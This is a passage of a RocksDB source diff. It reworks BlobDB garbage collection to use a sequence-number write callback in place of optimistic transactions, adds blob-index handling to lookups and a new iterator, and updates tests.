ColumnFamilyHandle* column_family, + const Slice& key, PinnableSlice* value, + bool* value_found = nullptr, bool* is_blob_index = nullptr); + using DB::MultiGet; virtual std::vector MultiGet( const ReadOptions& options, @@ -292,7 +299,8 @@ class DBImpl : public DB { // TODO(andrewkr): this API need to be aware of range deletion operations Status GetLatestSequenceForKey(SuperVersion* sv, const Slice& key, bool cache_only, SequenceNumber* seq, - bool* found_record_for_key); + bool* found_record_for_key, + bool* is_blob_index = nullptr); using DB::IngestExternalFile; virtual Status IngestExternalFile( @@ -1252,12 +1260,6 @@ class DBImpl : public DB { #endif // ROCKSDB_LITE - // Function that Get and KeyMayExist call with no_io true or false - // Note: 'value_found' from KeyMayExist propagates here - Status GetImpl(const ReadOptions& options, ColumnFamilyHandle* column_family, - const Slice& key, PinnableSlice* value, - bool* value_found = nullptr, bool* is_blob_index = nullptr); - bool GetIntPropertyInternal(ColumnFamilyData* cfd, const DBPropertyInfo& property_info, bool is_locked, uint64_t* value); diff --git a/db/memtable_list.cc b/db/memtable_list.cc index a9d9e1c0226..5921a50b351 100644 --- a/db/memtable_list.cc +++ b/db/memtable_list.cc @@ -110,14 +110,12 @@ bool MemTableListVersion::Get(const LookupKey& key, std::string* value, seq, read_opts, is_blob_index); } -bool MemTableListVersion::GetFromHistory(const LookupKey& key, - std::string* value, Status* s, - MergeContext* merge_context, - RangeDelAggregator* range_del_agg, - SequenceNumber* seq, - const ReadOptions& read_opts) { +bool MemTableListVersion::GetFromHistory( + const LookupKey& key, std::string* value, Status* s, + MergeContext* merge_context, RangeDelAggregator* range_del_agg, + SequenceNumber* seq, const ReadOptions& read_opts, bool* is_blob_index) { return GetFromList(&memlist_history_, key, value, s, merge_context, - range_del_agg, seq, read_opts); + range_del_agg, seq, read_opts, is_blob_index); } bool MemTableListVersion::GetFromList( diff --git a/db/memtable_list.h b/db/memtable_list.h index 23b5bbe558b..69038af5004 100644 --- a/db/memtable_list.h +++ b/db/memtable_list.h @@ -72,14 +72,16 @@ class MemTableListVersion { bool GetFromHistory(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, SequenceNumber* seq, - const ReadOptions& read_opts); + const ReadOptions& read_opts, + bool* is_blob_index = nullptr); bool GetFromHistory(const LookupKey& key, std::string* value, Status* s, MergeContext* merge_context, RangeDelAggregator* range_del_agg, - const ReadOptions& read_opts) { + const ReadOptions& read_opts, + bool* is_blob_index = nullptr) { SequenceNumber seq; return GetFromHistory(key, value, s, merge_context, range_del_agg, &seq, - read_opts); + read_opts, is_blob_index); } Status AddRangeTombstoneIterators(const ReadOptions& read_opts, Arena* arena, diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f6c6dc6e2bc..f6bc50cd206 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -32,8 +32,7 @@ #include "util/random.h" #include "util/sync_point.h" #include "util/timer_queue.h" -#include "utilities/transactions/optimistic_transaction.h" -#include "utilities/transactions/optimistic_transaction_db_impl.h" +#include "utilities/blob_db/blob_db_iterator.h" namespace { int kBlockBasedTableVersionFormat = 2; @@ -78,7 +77,7 @@ class BlobHandle { void EncodeTo(std::string* dst) const; - Status DecodeFrom(Slice* input); + Status DecodeFrom(const Slice& input); void clear(); @@ -109,10 +108,12 @@ void BlobHandle::clear() { compression_ = kNoCompression; } -Status BlobHandle::DecodeFrom(Slice* input) { - if (GetVarint64(input, &file_number_) && GetVarint64(input, &offset_) && - GetVarint64(input, &size_)) { - compression_ = static_cast(input->data()[0]); +Status BlobHandle::DecodeFrom(const Slice& input) { + Slice s(input); + Slice* p = &s; + if (GetVarint64(p, &file_number_) && GetVarint64(p, &offset_) && + GetVarint64(p, &size_)) { + compression_ = static_cast(p->data()[0]); return Status::OK(); } else { clear(); @@ -149,8 +150,7 @@ void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( value_type == CompactionEventListener::CompactionListenerValueType::kValue) { BlobHandle handle; - Slice lsmval(existing_value); - Status s = handle.DecodeFrom(&lsmval); + Status s = handle.DecodeFrom(existing_value); if (s.ok()) { if (impl_->debug_level_ >= 3) ROCKS_LOG_INFO(impl_->db_options_.info_log, @@ -211,8 +211,6 @@ Status BlobDBImpl::LinkToBaseDB(DB* db) { env_ = db_->GetEnv(); - opt_db_.reset(new OptimisticTransactionDBImpl(db, false)); - Status s = env_->CreateDirIfMissing(blob_dir_); if (!s.ok()) { ROCKS_LOG_WARN(db_options_.info_log, @@ -237,7 +235,6 @@ BlobDBOptions BlobDBImpl::GetBlobDBOptions() const { return bdb_options_; } BlobDBImpl::BlobDBImpl(DB* db, const BlobDBOptions& blob_db_options) : BlobDB(db), db_impl_(static_cast_with_check(db)), - opt_db_(new OptimisticTransactionDBImpl(db, false)), wo_set_(false), bdb_options_(blob_db_options), db_options_(db->GetOptions()), @@ -827,8 +824,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { extendTTL(&(bfile->ttl_range_), expiration); } - return WriteBatchInternal::Put(&updates_blob_, column_family_id, key, - index_entry); + return WriteBatchInternal::PutBlobIndex(&updates_blob_, column_family_id, + key, index_entry); } virtual Status DeleteCF(uint32_t column_family_id, @@ -997,18 +994,6 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, std::string headerbuf; Writer::ConstructBlobHeader(&headerbuf, key, value, expiration, -1); - // this is another more safer way to do it, where you keep the writeLock - // for the entire write path. this will increase latency and reduce - // throughput - // WriteLock lockbfile_w(&bfile->mutex_); - // std::shared_ptr writer = - // CheckOrCreateWriterLocked(bfile); - - if (debug_level_ >= 3) - ROCKS_LOG_DEBUG( - db_options_.info_log, ">Adding KEY FILE: %s: KEY: %s VALSZ: %d", - bfile->PathName().c_str(), key.ToString().c_str(), value.size()); - std::string index_entry; Status s = AppendBlob(bfile, headerbuf, key, value, &index_entry); if (!s.ok()) { @@ -1022,20 +1007,25 @@ Status BlobDBImpl::PutUntil(const WriteOptions& options, const Slice& key, } WriteBatch batch; - batch.Put(key, index_entry); + uint32_t column_family_id = + reinterpret_cast(DefaultColumnFamily())->GetID(); + s = WriteBatchInternal::PutBlobIndex(&batch, column_family_id, key, + index_entry); // this goes to the base db and can be expensive - s = db_->Write(options, &batch); - - // this is the sequence number of the write. - SequenceNumber sn = WriteBatchInternal::Sequence(&batch); - bfile->ExtendSequenceRange(sn); - - if (expiration != kNoExpiration) { - extendTTL(&(bfile->ttl_range_), expiration); + if (s.ok()) { + s = db_->Write(options, &batch); } if (s.ok()) { + // this is the sequence number of the write. + SequenceNumber sn = WriteBatchInternal::Sequence(&batch); + bfile->ExtendSequenceRange(sn); + + if (expiration != kNoExpiration) { + extendTTL(&(bfile->ttl_range_), expiration); + } + s = CloseBlobFileIfNeeded(bfile); } @@ -1112,21 +1102,16 @@ std::vector BlobDBImpl::MultiGet( // fetch and index entry and reading from the file. ReadOptions ro(read_options); bool snapshot_created = SetSnapshotIfNeeded(&ro); - std::vector values_lsm; - values_lsm.resize(keys.size()); - auto statuses = db_->MultiGet(ro, keys, &values_lsm); - TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:1"); - TEST_SYNC_POINT("BlobDBImpl::MultiGet:AfterIndexEntryGet:2"); - - values->resize(keys.size()); - assert(statuses.size() == keys.size()); - assert(values_lsm.size() == keys.size()); - for (size_t i = 0; i < keys.size(); ++i) { - if (!statuses[i].ok()) { - continue; - } - Status s = CommonGet(keys[i], values_lsm[i], &((*values)[i])); - statuses[i] = s; + + std::vector statuses; + statuses.reserve(keys.size()); + values->clear(); + values->reserve(keys.size()); + PinnableSlice value; + for (size_t i = 0; i < keys.size(); i++) { + statuses.push_back(Get(ro, DefaultColumnFamily(), keys[i], &value)); + values->push_back(value.ToString()); + value.Reset(); } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); @@ -1143,12 +1128,11 @@ bool BlobDBImpl::SetSnapshotIfNeeded(ReadOptions* read_options) { return true; } -Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, - std::string* value) { +Status BlobDBImpl::GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value) { assert(value != nullptr); - Slice index_entry_slice(index_entry); BlobHandle handle; - Status s = handle.DecodeFrom(&index_entry_slice); + Status s = handle.DecodeFrom(index_entry); if (!s.ok()) return s; // offset has to have certain min, as we will read CRC @@ -1179,9 +1163,8 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, bfile = hitr->second; } - // 0 - size - if (!handle.size() && value != nullptr) { - value->clear(); + if (handle.size() == 0 && value != nullptr) { + value->PinSelf(""); return Status::OK(); } @@ -1189,7 +1172,7 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, std::shared_ptr reader = GetOrOpenRandomAccessReader(bfile, env_, env_options_); - std::string* valueptr = value; + std::string* valueptr = value->GetSelf(); std::string value_c; if (bdb_options_.compression != kNoCompression) { valueptr = &value_c; @@ -1251,9 +1234,11 @@ Status BlobDBImpl::CommonGet(const Slice& key, const std::string& index_entry, blob_value.data(), blob_value.size(), &contents, kBlockBasedTableVersionFormat, Slice(), bdb_options_.compression, *(cfh->cfd()->ioptions())); - *value = contents.data.ToString(); + *(value->GetSelf()) = contents.data.ToString(); } + value->PinSelf(); + return s; } @@ -1271,13 +1256,16 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, bool snapshot_created = SetSnapshotIfNeeded(&ro); Status s; - std::string index_entry; - s = db_->Get(ro, key, &index_entry); + bool is_blob_index = false; + s = db_impl_->GetImpl(ro, column_family, key, value, nullptr /*value_found*/, + &is_blob_index); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:1"); TEST_SYNC_POINT("BlobDBImpl::Get:AfterIndexEntryGet:2"); if (s.ok()) { - s = CommonGet(key, index_entry, value->GetSelf()); - value->PinSelf(); + if (is_blob_index) { + PinnableSlice index_entry = std::move(*value); + s = GetBlobValue(key, index_entry, value); + } } if (snapshot_created) { db_->ReleaseSnapshot(ro.snapshot); @@ -1285,15 +1273,6 @@ Status BlobDBImpl::Get(const ReadOptions& read_options, return s; } -Slice BlobDBIterator::value() const { - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:1"); - TEST_SYNC_POINT("BlobDBIterator::value:BeforeGetBlob:2"); - Slice index_entry = iter_->value(); - Status s = - db_impl_->CommonGet(iter_->key(), index_entry.ToString(false), &vpart_); - return Slice(vpart_); -} - std::pair BlobDBImpl::SanityCheck(bool aborted) { if (aborted) return std::make_pair(false, -1); @@ -1411,14 +1390,13 @@ bool BlobDBImpl::FindFileAndEvictABlob(uint64_t file_number, uint64_t key_size, return true; } -bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& lsmValue) { - Slice val(lsmValue); +bool BlobDBImpl::MarkBlobDeleted(const Slice& key, const Slice& index_entry) { BlobHandle handle; - Status s = handle.DecodeFrom(&val); + Status s = handle.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_INFO(db_options_.info_log, "Could not parse lsm val in MarkBlobDeleted %s", - lsmValue.ToString().c_str()); + index_entry.ToString().c_str()); return false; } bool succ = FindFileAndEvictABlob(handle.filenumber(), key.size(), @@ -1618,7 +1596,52 @@ std::pair BlobDBImpl::WaStats(bool aborted) { return std::make_pair(true, -1); } -//////////////////////////////////////////////////////////////////////////////// +// Write callback for garbage collection to check if key has been updated +// since last read. Similar to how OptimisticTransaction works. See inline +// comment in GCFileAndUpdateLSM(). +class BlobDBImpl::GarbageCollectionWriteCallback : public WriteCallback { + public: + GarbageCollectionWriteCallback(ColumnFamilyData* cfd, const Slice& key, + SequenceNumber upper_bound) + : cfd_(cfd), key_(key), upper_bound_(upper_bound) {} + + virtual Status Callback(DB* db) override { + auto* db_impl = reinterpret_cast(db); + auto* sv = db_impl->GetAndRefSuperVersion(cfd_); + SequenceNumber latest_seq = 0; + bool found_record_for_key = false; + bool is_blob_index = false; + Status s = db_impl->GetLatestSequenceForKey( + sv, key_, false /*cache_only*/, &latest_seq, &found_record_for_key, + &is_blob_index); + db_impl->ReturnAndCleanupSuperVersion(cfd_, sv); + if (!s.ok() && !s.IsNotFound()) { + // Error. + assert(!s.IsBusy()); + return s; + } + if (s.IsNotFound()) { + assert(!found_record_for_key); + return Status::Busy("Key deleted"); + } + assert(found_record_for_key); + assert(is_blob_index); + if (latest_seq > upper_bound_) { + return Status::Busy("Key overwritten"); + } + return s; + } + + virtual bool AllowWriteBatching() override { return false; } + + private: + ColumnFamilyData* cfd_; + // Key to check + Slice key_; + // Upper bound of sequence number to proceed. + SequenceNumber upper_bound_; +}; + // iterate over the blobs sequentially and check if the blob sequence number // is the latest. If it is the latest, preserve it, otherwise delete it // if it is TTL based, and the TTL has expired, then @@ -1631,7 +1654,6 @@ std::pair BlobDBImpl::WaStats(bool aborted) { // // if it is not TTL based, then we can blow the key if the key has been // DELETED in the LSM -//////////////////////////////////////////////////////////////////////////////// Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, GCStats* gc_stats) { uint64_t now = EpochNow(); @@ -1656,14 +1678,14 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, bool first_gc = bfptr->gc_once_after_open_; - ColumnFamilyHandle* cfh = bfptr->GetColumnFamily(db_); + auto* cfh = bfptr->GetColumnFamily(db_); + auto* cfd = reinterpret_cast(cfh)->cfd(); + auto column_family_id = cfd->GetID(); bool has_ttl = header.HasTTL(); // this reads the key but skips the blob Reader::ReadLevel shallow = Reader::kReadHeaderKey; - assert(opt_db_); - bool no_relocation_ttl = (has_ttl && now >= bfptr->GetTTLRange().second); bool no_relocation_lsmdel = false; @@ -1683,59 +1705,52 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, BlobLogRecord record; std::shared_ptr newfile; std::shared_ptr new_writer; - Transaction* transaction = nullptr; uint64_t blob_offset = 0; - bool retry = false; - - static const WriteOptions kGarbageCollectionWriteOptions = []() { - WriteOptions write_options; - // It is ok to ignore column families that were dropped. - write_options.ignore_missing_column_families = true; - return write_options; - }(); while (true) { assert(s.ok()); - if (retry) { - // Retry in case transaction fail with Status::TryAgain. - retry = false; - } else { - // Read the next blob record. - Status read_record_status = - reader->ReadRecord(&record, shallow, &blob_offset); - // Exit if we reach the end of blob file. - // TODO(yiwu): properly handle ReadRecord error. - if (!read_record_status.ok()) { - break; - } - gc_stats->blob_count++; - } - transaction = - opt_db_->BeginTransaction(kGarbageCollectionWriteOptions, - OptimisticTransactionOptions(), transaction); - - std::string index_entry; - Status get_status = transaction->GetForUpdate(ReadOptions(), cfh, - record.Key(), &index_entry); - TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate"); - if (get_status.IsNotFound()) { - // Key has been deleted. Drop the blob record. - continue; + // Read the next blob record. + Status read_record_status = + reader->ReadRecord(&record, shallow, &blob_offset); + // Exit if we reach the end of blob file. + // TODO(yiwu): properly handle ReadRecord error. + if (!read_record_status.ok()) { + break; } - if (!get_status.ok()) { + gc_stats->blob_count++; + + // Similar to OptimisticTransaction, we obtain latest_seq from + // base DB, which is guaranteed to be no smaller than the sequence of + // current key. We use a WriteCallback on write to check the key sequence + // on write. If the key sequence is larger than latest_seq, we know + // a new versions is inserted and the old blob can be disgard. + // + // We cannot use OptimisticTransaction because we need to pass + // is_blob_index flag to GetImpl. + SequenceNumber latest_seq = GetLatestSequenceNumber(); + bool is_blob_index = false; + PinnableSlice index_entry; + Status get_status = db_impl_->GetImpl( + ReadOptions(), cfh, record.Key(), &index_entry, nullptr /*value_found*/, + &is_blob_index); + TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB"); + if (!get_status.ok() && !get_status.ok()) { + // error s = get_status; ROCKS_LOG_ERROR(db_options_.info_log, "Error while getting index entry: %s", s.ToString().c_str()); break; } + if (get_status.IsNotFound() || !is_blob_index) { + // Either the key is deleted or updated with a newer version whish is + // inlined in LSM. + continue; + } - // TODO(yiwu): We should have an override of GetForUpdate returning a - // PinnableSlice. - Slice index_entry_slice(index_entry); BlobHandle handle; - s = handle.DecodeFrom(&index_entry_slice); + s = handle.DecodeFrom(index_entry); if (!s.ok()) { ROCKS_LOG_ERROR(db_options_.info_log, "Error while decoding index entry: %s", @@ -1748,21 +1763,24 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, continue; } + GarbageCollectionWriteCallback callback(cfd, record.Key(), latest_seq); + // If key has expired, remove it from base DB. if (no_relocation_ttl || (has_ttl && now >= record.GetTTL())) { gc_stats->num_deletes++; gc_stats->deleted_size += record.GetBlobSize(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"); - transaction->Delete(cfh, record.Key()); - Status delete_status = transaction->Commit(); + WriteBatch delete_batch; + Status delete_status = delete_batch.Delete(record.Key()); + if (delete_status.ok()) { + delete_status = db_impl_->WriteWithCallback(WriteOptions(), + &delete_batch, &callback); + } if (delete_status.ok()) { gc_stats->delete_succeeded++; } else if (delete_status.IsBusy()) { // The key is overwritten in the meanwhile. Drop the blob record. gc_stats->overwritten_while_delete++; - } else if (delete_status.IsTryAgain()) { - // Retry the transaction. - retry = true; } else { // We hit an error. s = delete_status; @@ -1829,29 +1847,27 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, BlobLogRecord::kHeaderSize + record.Key().size() + record.Blob().size(); TEST_SYNC_POINT("BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"); - transaction->Put(cfh, record.Key(), new_index_entry); - Status put_status = transaction->Commit(); - if (put_status.ok()) { + WriteBatch rewrite_batch; + Status rewrite_status = WriteBatchInternal::PutBlobIndex( + &rewrite_batch, column_family_id, record.Key(), new_index_entry); + if (rewrite_status.ok()) { + rewrite_status = db_impl_->WriteWithCallback(WriteOptions(), + &rewrite_batch, &callback); + } + if (rewrite_status.ok()) { gc_stats->relocate_succeeded++; - } else if (put_status.IsBusy()) { + } else if (rewrite_status.IsBusy()) { // The key is overwritten in the meanwhile. Drop the blob record. gc_stats->overwritten_while_relocate++; - } else if (put_status.IsTryAgain()) { - // Retry the transaction. - // TODO(yiwu): On retry, we can reuse the new blob record. - retry = true; } else { // We hit an error. - s = put_status; + s = rewrite_status; ROCKS_LOG_ERROR(db_options_.info_log, "Error while relocating key: %s", s.ToString().c_str()); break; } } // end of ReadRecord loop - if (transaction != nullptr) { - delete transaction; - } ROCKS_LOG_INFO( db_options_.info_log, "%s blob file %" PRIu64 @@ -2195,12 +2211,20 @@ std::pair BlobDBImpl::RunGC(bool aborted) { } Iterator* BlobDBImpl::NewIterator(const ReadOptions& read_options) { + auto* cfd = + reinterpret_cast(DefaultColumnFamily())->cfd(); // Get a snapshot to avoid blob file get deleted between we // fetch and index entry and reading from the file. - ReadOptions ro(read_options); - bool snapshot_created = SetSnapshotIfNeeded(&ro); - return new BlobDBIterator(db_->NewIterator(ro), this, snapshot_created, - ro.snapshot); + ManagedSnapshot* own_snapshot = nullptr; + const Snapshot* snapshot = read_options.snapshot; + if (snapshot == nullptr) { + own_snapshot = new ManagedSnapshot(db_); + snapshot = own_snapshot->snapshot(); + } + auto* iter = db_impl_->NewIteratorImpl( + read_options, cfd, snapshot->GetSequenceNumber(), + true /*allow_blob*/); + return new BlobDBIterator(own_snapshot, iter, this); } Status DestroyBlobDB(const std::string& dbname, const Options& options, diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 5654d05e569..6496c585d34 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -18,6 +18,7 @@ #include #include +#include "db/db_iter.h" #include "rocksdb/compaction_filter.h" #include "rocksdb/db.h" #include "rocksdb/listener.h" @@ -37,7 +38,6 @@ namespace rocksdb { class DBImpl; class ColumnFamilyHandle; class ColumnFamilyData; -class OptimisticTransactionDBImpl; struct FlushJobInfo; namespace blob_db { @@ -215,9 +215,20 @@ class BlobDBImpl : public BlobDB { Status Get(const ReadOptions& read_options, ColumnFamilyHandle* column_family, const Slice& key, PinnableSlice* value) override; + Status GetBlobValue(const Slice& key, const Slice& index_entry, + PinnableSlice* value); + using BlobDB::NewIterator; virtual Iterator* NewIterator(const ReadOptions& read_options) override; + using BlobDB::NewIterators; + virtual Status NewIterators( + const ReadOptions& read_options, + const std::vector& column_families, + std::vector* iterators) override { + return Status::NotSupported("Not implemented"); + } + using BlobDB::MultiGet; virtual std::vector MultiGet( const ReadOptions& read_options, @@ -269,15 +280,14 @@ class BlobDBImpl : public BlobDB { #endif // !NDEBUG private: + class GarbageCollectionWriteCallback; + Status OpenPhase1(); // Create a snapshot if there isn't one in read options. // Return true if a snapshot is created. bool SetSnapshotIfNeeded(ReadOptions* read_options); - Status CommonGet(const Slice& key, const std::string& index_entry, - std::string* value); - Slice GetCompressedSlice(const Slice& raw, std::string* compression_output) const; @@ -416,10 +426,6 @@ class BlobDBImpl : public BlobDB { Env* env_; TTLExtractor* ttl_extractor_; - // Optimistic Transaction DB used during Garbage collection - // for atomicity - std::unique_ptr opt_db_; - // a boolean to capture whether write_options has been set std::atomic wo_set_; WriteOptions write_options_; @@ -527,55 +533,6 @@ class BlobDBImpl : public BlobDB { uint32_t debug_level_; }; -class BlobDBIterator : public Iterator { - public: - explicit BlobDBIterator(Iterator* iter, BlobDBImpl* impl, bool own_snapshot, - const Snapshot* snapshot) - : iter_(iter), - db_impl_(impl), - own_snapshot_(own_snapshot), - snapshot_(snapshot) { - assert(iter != nullptr); - assert(snapshot != nullptr); - } - - ~BlobDBIterator() { - if (own_snapshot_) { - db_impl_->ReleaseSnapshot(snapshot_); - } - delete iter_; - } - - bool Valid() const override { return iter_->Valid(); } - - void SeekToFirst() override { iter_->SeekToFirst(); } - - void SeekToLast() override { iter_->SeekToLast(); } - - void Seek(const Slice& target) override { iter_->Seek(target); } - - void SeekForPrev(const Slice& target) override { iter_->SeekForPrev(target); } - - void Next() override { iter_->Next(); } - - void Prev() override { iter_->Prev(); } - - Slice key() const override { return iter_->key(); } - - Slice value() const override; - - Status status() const override { return iter_->status(); } - - // Iterator::Refresh() not supported. - - private: - Iterator* iter_; - BlobDBImpl* db_impl_; - bool own_snapshot_; - const Snapshot* snapshot_; - mutable std::string vpart_; -}; - } // namespace blob_db } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_iterator.h b/utilities/blob_db/blob_db_iterator.h new file mode 100644 index 00000000000..c8aa1ff17ec --- /dev/null +++ b/utilities/blob_db/blob_db_iterator.h @@ -0,0 +1,104 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +#pragma once +#ifndef ROCKSDB_LITE + +#include "rocksdb/iterator.h" +#include "utilities/blob_db/blob_db_impl.h" + +namespace rocksdb { +namespace blob_db { + +using rocksdb::ManagedSnapshot; + +class BlobDBIterator : public Iterator { + public: + BlobDBIterator(ManagedSnapshot* snapshot, ArenaWrappedDBIter* iter, + BlobDBImpl* blob_db) + : snapshot_(snapshot), iter_(iter), blob_db_(blob_db) {} + + virtual ~BlobDBIterator() = default; + + bool Valid() const override { + if (!iter_->Valid()) { + return false; + } + return status_.ok(); + } + + Status status() const override { + if (!iter_->status().ok()) { + return iter_->status(); + } + return status_; + } + + void SeekToFirst() override { + iter_->SeekToFirst(); + UpdateBlobValue(); + } + + void SeekToLast() override { + iter_->SeekToLast(); + UpdateBlobValue(); + } + + void Seek(const Slice& target) override { + iter_->Seek(target); + UpdateBlobValue(); + } + + void SeekForPrev(const Slice& target) override { + iter_->SeekForPrev(target); + UpdateBlobValue(); + } + + void Next() override { + assert(Valid()); + iter_->Next(); + UpdateBlobValue(); + } + + void Prev() override { + assert(Valid()); + iter_->Prev(); + UpdateBlobValue(); + } + + Slice key() const override { + assert(Valid()); + return iter_->key(); + } + + Slice value() const override { + assert(Valid()); + if (!iter_->IsBlob()) { + return iter_->value(); + } + return value_; + } + + // Iterator::Refresh() not supported. + + private: + void UpdateBlobValue() { + TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:1"); + TEST_SYNC_POINT("BlobDBIterator::UpdateBlobValue:Start:2"); + value_.Reset(); + if (iter_->Valid() && iter_->IsBlob()) { + status_ = blob_db_->GetBlobValue(iter_->key(), iter_->value(), &value_); + } + } + + std::unique_ptr snapshot_; + std::unique_ptr iter_; + BlobDBImpl* blob_db_; + Status status_; + PinnableSlice value_; +}; +} // namespace blob_db +} // namespace rocksdb +#endif // !ROCKSDB_LITE diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index 5c15041e2da..b4907eef1fd 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -76,9 +76,14 @@ class BlobDBTest : public testing::Test { void PutRandom(const std::string &key, Random *rnd, std::map *data = nullptr) { + PutRandom(blob_db_, key, rnd, data); + } + + void PutRandom(DB *db, const std::string &key, Random *rnd, + std::map *data = nullptr) { int len = rnd->Next() % kMaxBlobSize + 1; std::string value = test::RandomHumanReadableString(rnd, len); - ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value))); + ASSERT_OK(db->Put(WriteOptions(), Slice(key), Slice(value))); if (data != nullptr) { (*data)[key] = value; } @@ -104,9 +109,12 @@ class BlobDBTest : public testing::Test { } // Verify blob db contain expected data and nothing more. - // TODO(yiwu): Verify blob files are consistent with data in LSM. void VerifyDB(const std::map &data) { - Iterator *iter = blob_db_->NewIterator(ReadOptions()); + VerifyDB(blob_db_, data); + } + + void VerifyDB(DB *db, const std::map &data) { + Iterator *iter = db->NewIterator(ReadOptions()); iter->SeekToFirst(); for (auto &p : data) { ASSERT_TRUE(iter->Valid()); @@ -582,7 +590,7 @@ TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) { ASSERT_OK(blob_db_impl->TEST_CloseBlobFile(blob_files[0])); SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", "BlobDBImpl::PutUntil:Start"}, {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}}); @@ -619,7 +627,7 @@ TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) { mock_env_->set_current_time(300); SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB", "BlobDBImpl::PutUntil:Start"}, {"BlobDBImpl::PutUntil:Finish", "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); @@ -676,7 +684,7 @@ TEST_F(BlobDBTest, GCOldestSimpleBlobFileWhenOutOfSpace) { TEST_F(BlobDBTest, ReadWhileGC) { // run the same test for Get(), MultiGet() and Iterator each. - for (int i = 0; i < 3; i++) { + for (int i = 0; i < 2; i++) { BlobDBOptions bdb_options; bdb_options.disable_background_tasks = true; Open(bdb_options); @@ -699,17 +707,10 @@ TEST_F(BlobDBTest, ReadWhileGC) { break; case 1: SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBImpl::MultiGet:AfterIndexEntryGet:1", + {{"BlobDBIterator::UpdateBlobValue:Start:1", "BlobDBTest::ReadWhileGC:1"}, {"BlobDBTest::ReadWhileGC:2", - "BlobDBImpl::MultiGet:AfterIndexEntryGet:2"}}); - break; - case 2: - SyncPoint::GetInstance()->LoadDependency( - {{"BlobDBIterator::value:BeforeGetBlob:1", - "BlobDBTest::ReadWhileGC:1"}, - {"BlobDBTest::ReadWhileGC:2", - "BlobDBIterator::value:BeforeGetBlob:2"}}); + "BlobDBIterator::UpdateBlobValue:Start:2"}}); break; } SyncPoint::GetInstance()->EnableProcessing(); @@ -724,12 +725,6 @@ TEST_F(BlobDBTest, ReadWhileGC) { ASSERT_EQ("bar", value); break; case 1: - statuses = blob_db_->MultiGet(ReadOptions(), {"foo"}, &values); - ASSERT_EQ(1, statuses.size()); - ASSERT_EQ(1, values.size()); - ASSERT_EQ("bar", values[0]); - break; - case 2: // VerifyDB use iterator to scan the DB. VerifyDB({{"foo", "bar"}}); break; @@ -823,6 +818,58 @@ TEST_F(BlobDBTest, GetLiveFilesMetaData) { VerifyDB(data); } +TEST_F(BlobDBTest, MigrateFromPlainRocksDB) { + constexpr size_t kNumKey = 20; + constexpr size_t kNumIteration = 10; + Random rnd(301); + std::map data; + std::vector is_blob(kNumKey, false); + + // Write to plain rocksdb. + Options options; + options.create_if_missing = true; + DB *db = nullptr; + ASSERT_OK(DB::Open(options, dbname_, &db)); + for (size_t i = 0; i < kNumIteration; i++) { + auto key_index = rnd.Next() % kNumKey; + std::string key = "key" + ToString(key_index); + PutRandom(db, key, &rnd, &data); + } + VerifyDB(db, data); + delete db; + db = nullptr; + + // Open as blob db. Verify it can read existing data. + Open(); + VerifyDB(blob_db_, data); + for (size_t i = 0; i < kNumIteration; i++) { + auto key_index = rnd.Next() % kNumKey; + std::string key = "key" + ToString(key_index); + is_blob[key_index] = true; + PutRandom(blob_db_, key, &rnd, &data); + } + VerifyDB(blob_db_, data); + delete blob_db_; + blob_db_ = nullptr; + + // Verify plain db return error for keys written by blob db. + ASSERT_OK(DB::Open(options, dbname_, &db)); + std::string value; + for (size_t i = 0; i < kNumKey; i++) { + std::string key = 